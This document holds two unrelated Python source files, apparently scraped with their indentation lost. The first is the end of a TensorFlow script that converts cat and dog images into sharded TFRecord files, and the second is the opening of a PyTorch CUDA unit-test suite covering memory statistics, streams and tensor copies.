image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
"""
from datetime import datetime
import os
import random
import sys
import threading
import tensorflow as tf
import numpy as np
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('train_directory', './train',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', './val',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', 'labels_file.txt', 'Labels file')
def _create_labels_file(data_dir):
"""Reads addresses and labels from `data_dir`.
The `tf.gfile.Glob` module return a list of paths matching a pathname pattern
Args:
data_dir = Path to the `input image folder`.
Returns:
matching_files: list, address of each picture in the train folder.
class_labels: list, 0 = Cat, 1 = Dog.
class_text: list, unique labels
"""
jpeg_file_path = f'{data_dir}/*.jpg'
matching_files = tf.gfile.Glob(jpeg_file_path)
class_text = ['cat' if 'cat' in addr else 'dog' for addr in matching_files]
# Write labels_file
output = []
for x in class_text:
if x not in output:
output.append(x)
with open('labels_file.txt', 'w') as writer:
for unique_label_text in output:
writer.write(f'{unique_label_text}\n')
return None
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/image0.JPEG
data_dir/dog/image1.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list[l.strip() for l in tf.gfile.GFile(
labels_file, 'r').readlines()] of integer; each integer identifies the ground truth.
"""
print(f'Determining list of input files and labels from {data_dir}.')
unique_labels = [l.strip() for l in tf.gfile.GFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = f'{data_dir}/{text}/*'
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(
image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(
self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g. '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding preprocessing.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.GFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g. 'path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(
features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding preprocessing.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
with tf.python_io.TFRecordWriter(output_file) as writer:
shard_counter = 0
files_in_shard = np.arange(
shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(
filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' %
filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(
0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' %
(FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
# assert not FLAGS.validation_shards % FLAGS.num_threads, (
# 'Please make the FLAGS.num_threads commensurate with '
# 'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
# _process_dataset('validation', FLAGS.validation_directory,
# FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.cuda.IntStorage))
q_copy[1].fill_(10)
self.assertTrue(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
